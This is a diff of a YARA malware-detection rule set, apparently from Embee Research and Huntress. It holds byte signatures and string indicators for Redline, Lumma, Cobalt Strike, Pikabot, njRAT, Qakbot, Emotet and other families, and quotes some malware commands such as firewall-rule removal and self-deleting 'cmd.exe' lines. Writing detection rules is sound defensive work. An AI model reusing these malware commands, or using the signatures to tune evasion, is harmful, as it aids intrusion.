condition: any of them } -rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE +rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes { meta: - description = "Bytecodes found in late 2023 Redline malware" + description = "Encryption observed in MarsStealer" author = "Matthew @ Embee_Research" - id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31" - date = "2023-08-27" - modified = "2024-01-02" + id = "7a66ea9c-966e-5780-8b36-a268904b9c1b" + date = "2023-12-24" + modified = "2023-12-24" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16" license_url = "N/A" - hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332" - logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f" + hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1" + logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 } - $s2 = "mscoree.dll" ascii + $s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca} condition: - $s1 and $s2 and uint16(0)==0x5a4d + $s1 } -rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023 +rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE { meta: - description = "Patterns observed in redline loader" - author = "Matthew @ Embee_Research" - id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111" - date = "2023-12-24" - modified = "2023-12-29" + description = "Detection of an encoder observed with Cobalt Strike shellcode" + author = "Matthew @ Embee_research" + id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84" + date = "2023-07-03" + modified = "2023-07-03" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21" license_url = "N/A" - hash = "" - logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010" + logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0" score = 75 quality = 75 - tags = "" + tags = "FILE" + vendor = "" strings: - $s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75} - $s2 = "WritePrivateProfileStringA" - $s3 = "SetFileShortNameA" - $s4 = "- Attempt to use MSIL code from this assembly during native code initialization" + $get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00} + $decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3} + $b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii condition: - all of them + (($get_enc_offset and $decode_loop) or $b64_initial_bytes) and filesize <10000KB } -rule EMBEERESEARCH_Win_Lumma_Update_Simple_Strings_Sep_2023 : FILE +rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE { meta: - description = "" + description = "Bytecodes found in late 2023 Redline malware" author = "Matthew @ Embee_Research" - id = "90209fc6-fd50-5b55-a400-112b2f207885" - date = "2023-09-13" - modified = "2023-09-21" + id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31" + date = "2023-08-27" + modified = "2024-01-02" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma_updated_sep_2023.yar#L1-L25" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22" license_url = "N/A" - hash = "898a2bdbbb33ccd63b038c67d217554a668a52e9642874bd0f57e08153e6e5be" - logic_hash = "61571057a5a9c114b6ed5b94b922f2b389406a05e705b3e9e6ddbee221f74c92" + hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332" + logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Do you want to run a malware ?" wide - $s2 = "c2sock" wide - $s3 = "TeslaBrowser/5" wide - $s4 = "Crypt build to disable this message" wide + $s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 } + $s2 = "mscoree.dll" ascii condition: - uint16(0)==0x5a4d and filesize <5000KB and ( all of ($s*)) + $s1 and $s2 and uint16(0)==0x5a4d } -import "dotnet" +import "math" +import "pe" -rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023 +rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023 { meta: - description = "" + description = "Pikabot Loaders embedding encrypted inside of numerous png images" author = "Matthew @ Embee_Research" - id = "c89711cb-aae9-5409-80c2-145a8d5fca56" + id = "253d35ae-a325-51c7-8da5-32bb46c51acd" date = "2023-10-03" - modified = "2023-10-03" + modified = "2023-10-08" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_resource_entropy_oct_2023.yar#L5-L40" license_url = "N/A" - hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474" - logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b" + hash = "936247d9a0ce76bed17f03430186abb9ecafa88ef3a968cdd46c5b0a24a5cc3f" + hash = "2c7b7c3ec8a6a835e07c8feed401460e185388f59ea5fc8aa8038d2b75815666" + hash = "00239c55d7135aa06e21ace557a3e8bf3818c2e07051c84753209e7348b6a426" + hash = "5f218eeb83c936d88b65ec3f3052d8c53f58775dacc04bedc91bd388fb7bb885" + hash = "6bea3ecd1f43bdcc261719fb732fcf27e82ed6f4b086616925291a733f358a26" + hash = "966042f3e532b6abce7d96bbdb91dc4561b32a4b0b9eec7b08b4f1024c2da916" + hash = "951c906a1fa179050d30c06849d42e49a295dd1baad91efb244b2e5486b5801d" + hash = "a06bd2623c389f2547d0bf750ca720ab7a74c90982267aad49ba31d5de345288" + hash = "aeb2bf8898636b572b0703d9ddb90b9a4c5c6db9eee631ee726ad753f197ac12" + logic_hash = "7beec034fc927990734691bd6859870921027860c0591c7a0d5a3815f919112d" score = 75 - quality = 75 + quality = 50 tags = "" strings: - $s1 = "netsh firewall delete allowedprogram" wide - $s2 = "cmd.exe /c ping 0 -n 2 & del" wide - $s3 = "netsh firewall add allowedprogram" wide - $s4 = "Execute ERROR" wide - $s5 = "Update ERROR" wide - $s6 = "Download ERROR" wide + $s1 = "ARROW-DOWN" wide + $s2 = "ARROW-LEFT" wide + $s3 = "ARROW-RIGHT" wide condition: - dotnet.is_dotnet and ( all of ($s*)) + pe.DLL and ( all of ($s*)) and pe.number_of_resources>25 and pe.sections[3].raw_data_size>400KB and math.entropy(pe.sections[3].raw_data_offset,pe.sections[3].raw_data_size)>7.5 } -rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023 +rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023 { meta: - description = "Strings observed in Berbew malware." + description = "Configuration related bytecodes in redline .net files" author = "Matthew @ Embee_Research" - id = "402711af-c543-5c95-ae9e-e663825b6653" - date = "2023-12-24" - modified = "2023-12-26" + id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc" + date = "2023-10-11" + modified = "2023-10-11" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35" license_url = "N/A" - hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae" - logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8" + hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf" + logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654" score = 75 quality = 75 tags = "" strings: - $s1 = "This KEWL STUFF was coded by V. V. PUPKIN" - $s2 = "REAL CASH, REAL BITCHEZ" - $s3 = "Please, enter your Card Number" + $s_1 = { + 20 ?? ?? ?? ?? // ldc.i4 + 2B 00 // br.s + 28 ?? ?? ?? 2B // Call + 80 ?? ?? ?? 04 // stsfld + (20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70) // ldc.i4, br.s, call OR ldstr + 80 ?? ?? ?? 04 // Call + (20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70) // ldc.i4, br.s, call OR ldstr + 80 ?? ?? ?? 04 // Call + 20 ?? ?? ?? ?? // ldc.i4 + 2B00 // br.s + 28 ?? ?? ?? 2B // Call + 80 ?? ?? ?? 04 // stsfld + 2A // ret + } + $s_2 = "mscoree.dll" condition: - all of them + $s_1 and $s_2 } rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023 { @@ -210659,32 +212579,225 @@ rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023 condition: $s1 or $s2 or $s3 } -import "dotnet" +rule EMBEERESEARCH_Win_Medusa_Bytecodes +{ + meta: + description = "Medusa Bytecodes" + author = "Matthew @ Embee_Research" + id = "48b659f8-cd26-540a-89b6-6349f8d21e8f" + date = "2023-08-27" + modified = "2024-03-03" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17" + license_url = "N/A" + hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c" + logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968" + score = 75 + quality = 75 + tags = "" -rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023 + strings: + $s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 } + $s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii + + condition: + $s1 or $s2 +} +rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE { meta: description = "No description has been set in the source file - EmbeeResearch" - author = "Matthew @embee_research" - id = "9d1c5010-7c64-5a6a-bf60-35c042732761" - date = "2023-09-21" - modified = "2023-09-21" + author = "@Embee_Research" + id = "b5478404-659d-5b3a-b722-f8ba33875d8a" + date = "2022-11-14" + modified = "2022-12-01" + reference = "https://twitter.com/embee_research/status/1592067841154756610" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_api_hashing_oct_2022.yar#L2-L21" + license_url = "N/A" + logic_hash = "595cabd508ee60c5606f965eb9a290ae21ea32af0f56e213f6ce2d2e35dc4e11" + score = 75 + quality = 75 + tags = "FILE" + vendor = "Huntress Labs" + + strings: + $qakbot_hashing = {0f b6 04 39 33 f0 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 41 3b ca} + + condition: + any of them +} +rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE +{ + meta: + description = "Experimental Yara rule for patterns observed in Nighthawk" + author = "Embee_Research @ Huntress" + id = "853b0623-ea35-5055-90d0-bb2b5aea8ecd" + date = "2022-11-23" + modified = "2023-10-18" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_nighthawk_nov_2022.yar#L1-L100" license_url = "N/A" - hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04" - hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce" - hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5" - logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612" + logic_hash = "ef39067c12396db1de2feb560ff5628cbb3126e34e6318e88bdb08f6eb7940fb" + score = 50 + quality = 67 + tags = "FILE" + vendor = "Huntress" + sharing = "TLP:White" + + strings: + $s1 = {c6 ad b1 fd} + $s2 = {97 16 5f fa} + $s3 = {d0 05 89 e9} + $s4 = {bf 27 3f 97} + $s5 = {d7 12 2f 49} + $s6 = {f2 b7 78 2b} + $s7 = {09 c4 e6 fb} + $s8 = {54 af d9 1a} + $s9 = {04 e4 72 6e} + $s10 = {4f 06 7d 7d} + $s11 = {93 ee 23 66} + $g1 = {bf bf d1 d5} + $g2 = {7c 75 84 91} + $g3 = {47 fb eb 2b} + $g4 = {42 24 3d 39} + $g5 = {e7 e9 ef ee} + $g6 = {47 fd 36 2e} + $g7 = {39 de 19 3d} + $g8 = {20 df db f7} + $g9 = {45 34 2a 41} + $g10 = {7d 1c 44 2e} + $g11 = {7d 28 44 2e} + $g12 = {94 36 65 8d} + $ror_1 = {48 ff c2 c1 c9 08 0f be c0 03 c8} + $ror_2 = {41 c1 c8 08 41 80 fa 61} + $gs_offset_1 = {65 48 8b 04 25 30 00 00 00 48 8b 48 60 4c 8b 59 18} + $gs_offset_2 = {65 48 8b 04 25 30 00 00 00 8b d9 48 8b 50 60 4c 8b 4a 18 49 83 c1 10} + $shr_block = {c1 e9 02 33 ca 66 d1 e8 d1 e9 33 ca c1 e9 02 33 ca c1 e2 0f} + + condition: + uint16(0)==0x5a4d and filesize <5000KB and ((((3 of ($s*)) or (3 of ($g*))) and ((1 of ($ror*)) and (1 of ($gs_offset*)))) or $shr_block) +} +rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE +{ + meta: + description = "Yara rule to detect GraceWireLoader via usage of Stack Strings" + author = "Embee_Research @ Huntress" + id = "63d0cd9f-34f7-5ec4-8061-66d36859bd0c" + date = "2022-12-12" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_gracewire_loader_dec_2022.yar#L2-L24" + license_url = "N/A" + logic_hash = "168af6d24c0646e90717f27e6ba4a18da8e92950ffa7a881243860305037da48" score = 75 quality = 75 - tags = "" + tags = "FILE" strings: - $s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? } + $ZwAllocateVirtualMemory = {c6 44 24 48 5a c6 44 24 49 77 c6 44 24 4a 41 c6 44 24 4b 6c c6 44 24 4c 6c c6 44 24 4d 6f c6 44 24 4e 63 c6 44 24 4f 61 c6 44 24 50 74 c6 44 24 51 65 c6 44 24 52 56 c6 44 24 53 69 c6 44 24 54 72 c6 44 24 55 74 c6 44 24 56 75 c6 44 24 57 61 c6 44 24 58 6c c6 44 24 59 4d c6 44 24 5a 65 c6 44 24 5b 6d c6 44 24 5c 6f} + $LdrGetProcedureAddress = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 47 c6 44 24 54 65 c6 44 24 55 74 c6 44 24 56 50 c6 44 24 57 72 c6 44 24 58 6f c6 44 24 59 63 c6 44 24 5a 65 c6 44 24 5b 64 c6 44 24 5c 75 c6 44 24 5d 72 c6 44 24 5e 65 c6 44 24 5f 41 c6 44 24 60 64 c6 44 24 61 64 c6 44 24 62 72 c6 44 24 63 65 c6 44 24 64 73 c6 44 24 65 73 c6 44 24 66 00} + $LdrLoadDLL = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 4c c6 44 24 54 6f c6 44 24 55 61 c6 44 24 56 64 c6 44 24 57 44 c6 44 24 58 6c c6 44 24 59 6c} + $ZwFreeVirtualMemory = {c6 44 24 30 5a c6 44 24 31 77 c6 44 24 32 46 c6 44 24 33 72 c6 44 24 34 65 c6 44 24 35 65 c6 44 24 36 56 c6 44 24 37 69 c6 44 24 38 72 c6 44 24 39 74 c6 44 24 3a 75 c6 44 24 3b 61 c6 44 24 3c 6c c6 44 24 3d 4d c6 44 24 3e 65 c6 44 24 3f 6d c6 44 24 40 6f c6 44 24 41 72 c6 44 24 42 79} condition: - dotnet.is_dotnet and $s1 + 3 of them +} +rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE +{ + meta: + description = "No description has been set in the source file - EmbeeResearch" + author = "Embee_Research @ Huntress" + id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536" + date = "2022-10-14" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18" + license_url = "N/A" + logic_hash = "da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07} + + condition: + $IcedID +} +rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE +{ + meta: + description = "Detection of Brute Ratel Badger via api hashes of Nt* functions. " + author = "Embee_Research @ Huntress" + id = "b82612b4-272e-5ae2-bd87-3593e55918f8" + date = "2022-10-12" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_bruteratel_syscall_hashes_oct_2022.yar#L1-L23" + license_url = "N/A" + logic_hash = "e284d5568e0b5ffa0f231f98ecce13b5f5518a4e005ea001a5c89087c91eb8a1" + score = 60 + quality = 25 + tags = "FILE" + vendor = "Huntress" + + strings: + $hash1 = {89 4d 39 8c} + $hash2 = {bd ca 3b d3} + $hash3 = {b2 c1 06 ae} + $hash4 = {74 eb 1d 4d} + + condition: + ( uint16(0)==0x5a4d or uint16(0)==0x00e8) and (2 of ($hash*)) +} +rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE +{ + meta: + description = "No description has been set in the source file - EmbeeResearch" + author = "embee_research @ HuntressLabs" + id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c" + date = "2022-10-11" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24" + license_url = "N/A" + logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3" + score = 75 + quality = 75 + tags = "FILE" + vendor = "Huntress Research" + + strings: + $dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef} + $shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4} + + condition: + ( any of them ) and ( uint16(0)==0x5a4d or uint16(0)==0x00e8 or uint16(0)==0x4856) +} +rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE +{ + meta: + description = "Detection of string hashing routines observed in emotet" + author = "Embee_Research @ HuntressLabs" + id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7" + date = "2022-10-14" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19" + license_url = "N/A" + logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce} + $em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9} + $em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00} + $em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2} + + condition: + uint16(0)==0x5a4d and ( any of them ) } rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE { @@ -210708,208 +212821,12 @@ rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE condition: uint16(0)==0x5a4d and $qakbot_decrypt } -rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE -{ - meta: - description = "Yara rule to detect GraceWireLoader via usage of Stack Strings" - author = "Embee_Research @ Huntress" - id = "63d0cd9f-34f7-5ec4-8061-66d36859bd0c" - date = "2022-12-12" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_gracewire_loader_dec_2022.yar#L2-L24" - license_url = "N/A" - logic_hash = "168af6d24c0646e90717f27e6ba4a18da8e92950ffa7a881243860305037da48" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $ZwAllocateVirtualMemory = {c6 44 24 48 5a c6 44 24 49 77 c6 44 24 4a 41 c6 44 24 4b 6c c6 44 24 4c 6c c6 44 24 4d 6f c6 44 24 4e 63 c6 44 24 4f 61 c6 44 24 50 74 c6 44 24 51 65 c6 44 24 52 56 c6 44 24 53 69 c6 44 24 54 72 c6 44 24 55 74 c6 44 24 56 75 c6 44 24 57 61 c6 44 24 58 6c c6 44 24 59 4d c6 44 24 5a 65 c6 44 24 5b 6d c6 44 24 5c 6f} - $LdrGetProcedureAddress = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 47 c6 44 24 54 65 c6 44 24 55 74 c6 44 24 56 50 c6 44 24 57 72 c6 44 24 58 6f c6 44 24 59 63 c6 44 24 5a 65 c6 44 24 5b 64 c6 44 24 5c 75 c6 44 24 5d 72 c6 44 24 5e 65 c6 44 24 5f 41 c6 44 24 60 64 c6 44 24 61 64 c6 44 24 62 72 c6 44 24 63 65 c6 44 24 64 73 c6 44 24 65 73 c6 44 24 66 00} - $LdrLoadDLL = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 4c c6 44 24 54 6f c6 44 24 55 61 c6 44 24 56 64 c6 44 24 57 44 c6 44 24 58 6c c6 44 24 59 6c} - $ZwFreeVirtualMemory = {c6 44 24 30 5a c6 44 24 31 77 c6 44 24 32 46 c6 44 24 33 72 c6 44 24 34 65 c6 44 24 35 65 c6 44 24 36 56 c6 44 24 37 69 c6 44 24 38 72 c6 44 24 39 74 c6 44 24 3a 75 c6 44 24 3b 61 c6 44 24 3c 6c c6 44 24 3d 4d c6 44 24 3e 65 c6 44 24 3f 6d c6 44 24 40 6f c6 44 24 41 72 c6 44 24 42 79} - - condition: - 3 of them -} -rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE -{ - meta: - description = "Experimental Yara rule for patterns observed in Nighthawk" - author = "Embee_Research @ Huntress" - id = "853b0623-ea35-5055-90d0-bb2b5aea8ecd" - date = "2022-11-23" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_nighthawk_nov_2022.yar#L1-L100" - license_url = "N/A" - logic_hash = "ef39067c12396db1de2feb560ff5628cbb3126e34e6318e88bdb08f6eb7940fb" - score = 50 - quality = 67 - tags = "FILE" - vendor = "Huntress" - sharing = "TLP:White" - - strings: - $s1 = {c6 ad b1 fd} - $s2 = {97 16 5f fa} - $s3 = {d0 05 89 e9} - $s4 = {bf 27 3f 97} - $s5 = {d7 12 2f 49} - $s6 = {f2 b7 78 2b} - $s7 = {09 c4 e6 fb} - $s8 = {54 af d9 1a} - $s9 = {04 e4 72 6e} - $s10 = {4f 06 7d 7d} - $s11 = {93 ee 23 66} - $g1 = {bf bf d1 d5} - $g2 = {7c 75 84 91} - $g3 = {47 fb eb 2b} - $g4 = {42 24 3d 39} - $g5 = {e7 e9 ef ee} - $g6 = {47 fd 36 2e} - $g7 = {39 de 19 3d} - $g8 = {20 df db f7} - $g9 = {45 34 2a 41} - $g10 = {7d 1c 44 2e} - $g11 = {7d 28 44 2e} - $g12 = {94 36 65 8d} - $ror_1 = {48 ff c2 c1 c9 08 0f be c0 03 c8} - $ror_2 = {41 c1 c8 08 41 80 fa 61} - $gs_offset_1 = {65 48 8b 04 25 30 00 00 00 48 8b 48 60 4c 8b 59 18} - $gs_offset_2 = {65 48 8b 04 25 30 00 00 00 8b d9 48 8b 50 60 4c 8b 4a 18 49 83 c1 10} - $shr_block = {c1 e9 02 33 ca 66 d1 e8 d1 e9 33 ca c1 e9 02 33 ca c1 e2 0f} - - condition: - uint16(0)==0x5a4d and filesize <5000KB and ((((3 of ($s*)) or (3 of ($g*))) and ((1 of ($ror*)) and (1 of ($gs_offset*)))) or $shr_block) -} -rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE -{ - meta: - description = "Detection of Brute Ratel Badger via api hashes of Nt* functions. " - author = "Embee_Research @ Huntress" - id = "b82612b4-272e-5ae2-bd87-3593e55918f8" - date = "2022-10-12" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_bruteratel_syscall_hashes_oct_2022.yar#L1-L23" - license_url = "N/A" - logic_hash = "e284d5568e0b5ffa0f231f98ecce13b5f5518a4e005ea001a5c89087c91eb8a1" - score = 60 - quality = 25 - tags = "FILE" - vendor = "Huntress" - - strings: - $hash1 = {89 4d 39 8c} - $hash2 = {bd ca 3b d3} - $hash3 = {b2 c1 06 ae} - $hash4 = {74 eb 1d 4d} - - condition: - ( uint16(0)==0x5a4d or uint16(0)==0x00e8) and (2 of ($hash*)) -} -rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE -{ - meta: - description = "No description has been set in the source file - EmbeeResearch" - author = "Embee_Research @ Huntress" - id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536" - date = "2022-10-14" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18" - license_url = "N/A" - logic_hash = 